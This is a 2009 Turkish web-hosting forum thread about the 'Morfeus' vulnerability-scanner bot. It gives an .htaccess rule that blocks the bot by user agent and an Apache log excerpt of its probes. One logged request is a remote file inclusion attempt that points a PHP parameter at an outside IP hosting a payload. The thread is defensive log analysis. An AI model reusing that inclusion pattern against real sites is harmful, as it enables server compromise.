User Agent: Morfeus strikes again

selim61 · 14 Aralık 2009

Morfeus strikes again yada Morfeus Fucking Scanner
Sunucunuzda kurulu ise webalizer(herhangi bir sitenin istatistik panelinden) den görebilirsiniz. Bu bot sitenizdeki ve sunucunuzdaki güvenlik açıklarını tarar. Özellikle hazır betik scriptler kullananlar için exploitleri rahatça görebilir. Çok basit bir örnek wordpress

Şu anki kayıtlara göre İspanya lokasyonlu ama eski kayıtlarda abd lokasyon görünüyor, muhtemelen hiçbiri değil

Nasıl kurtulacağım?
htaccess

PHP:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]

Tabiki tek suçlu bu değil zararlı birkaç spam botları daha http://www.wise-women.org/tutorials/htaccess/block-spambots.txt

selim61 · 14 Aralık 2009

Nasıl yapara örnek:

primo:/var/log/apache2/primo# grep -ri Morfeus * | cut -d\ -f7,12-17 | sort | uniq
/bb/jscripts/post.js "Morfeus strikes again."
/bbs/jscripts/post.js "Morfeus strikes again."
/chat/jscripts/post.js "Morfeus strikes again."
/community/jscripts/post.js "Morfeus strikes again."
/foro/jscripts/post.js "Morfeus strikes again."
/foros/jscripts/post.js "Morfeus strikes again."
/forum/jscripts/post.js "Morfeus strikes again."
/forums/jscripts/post.js "Morfeus strikes again."
/jscripts/post.js "Morfeus strikes again."
/mybb/jscripts/post.js "Morfeus strikes again."
/myBB/jscripts/post.js "Morfeus strikes again."
/MyBB/jscripts/post.js "Morfeus strikes again."
/phgstats/index.php?phgdir=http://80.34.102.151/joomla/1.gif?/ "Morfeus Fucking Scanner"
/phorum/jscripts/post.js "Morfeus strikes again."

Loi · 14 Aralık 2009

Banada ugradi bu. htaccess en mantıklı cozum

User Agent: Morfeus strikes again

selim61

0

selim61

0

Loi

0

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5